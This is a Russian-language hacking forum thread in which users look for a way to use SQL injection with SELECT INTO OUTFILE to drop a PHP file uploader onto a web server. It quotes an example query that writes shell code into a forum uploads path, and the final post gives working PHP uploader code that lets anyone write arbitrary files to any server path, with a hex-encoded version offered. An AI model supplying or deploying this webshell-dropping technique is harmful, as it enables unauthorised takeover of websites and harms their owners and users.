Друзья, не стал флеймить по разделам.. где-то тут на форуме проскакивал код SQL ( аплоадера.. ) ну.. что бы потом его INTO OUTFILE.. т.е. не код шелла в базу.. а именно там был код простенького php аплоадера.. а потом уже можно заливать все, что хочешь... ткните носом в тему, вчера ночью все обыскал
groundhog, нет.. именно php аплоадер.. не прохексенный.. а код.. дело в том, что там некоторые символы фильтруются ведь..
Sn@k3, йа плакаль ) ща /thread76949-%F8%E5%EB%EB+SQL.html вот тут INSERT INTO `shell` bla bla.. SELECT ("код шела") INTO OUTFILE '/var/www/forum/uploads/counter.php'; именно аплоадер нужен.. своими глазами видел код, мы с вами не о том говоримм )) :-D
Артем Солнце, спасибо ) единственный, до кого дошло Тут код АПЛОАДЕРА был с обходом фильтрации спец. символов.. вот как-то я его видел.. а вчера нужен был - полночи гуглил " sql шелл into site:forum.antichat.ru" и в таком духе .. =\
я ничего не понял, тебе нужен был sql запрос? вот например простинький пример phpuploader PHP: <?php $path = $_SERVER['DOCUMENT_ROOT']; $path_to_script = $_SERVER['PHP_SELF']; $uplouder = <<<HERE <html> <head> <META http-equiv=Content-Type content="text/html; charset="windows-1251"> <title> Загрузка файлов на сервер </title> </head> <body> <h2><b> Форма для загрузки файлов </b></h2> <form action="$path_to_script" method="post" enctype="multipart/form-data"> Путь к файлу на сервере <input type="text" name="new_path" value = $path><br> Имя файла на сервере <input type="text" name="new_name" value = "uploud.php"><br> <input type="file" name="filename"><br> <input type="submit" value="3aгpyзитьтb"><br> </form> </body> </html> HERE; $uploadfile= @$_POST['new_path'] . "/" . @$_POST['new_name']; if (move_uploaded_file(@$_FILES['filename']['tmp_name'], $uploadfile)) { echo "Файл успешно загруженн, он доступен по этому пути:" . $uploadfile ; } else { echo $uplouder; } ?> a вот в hex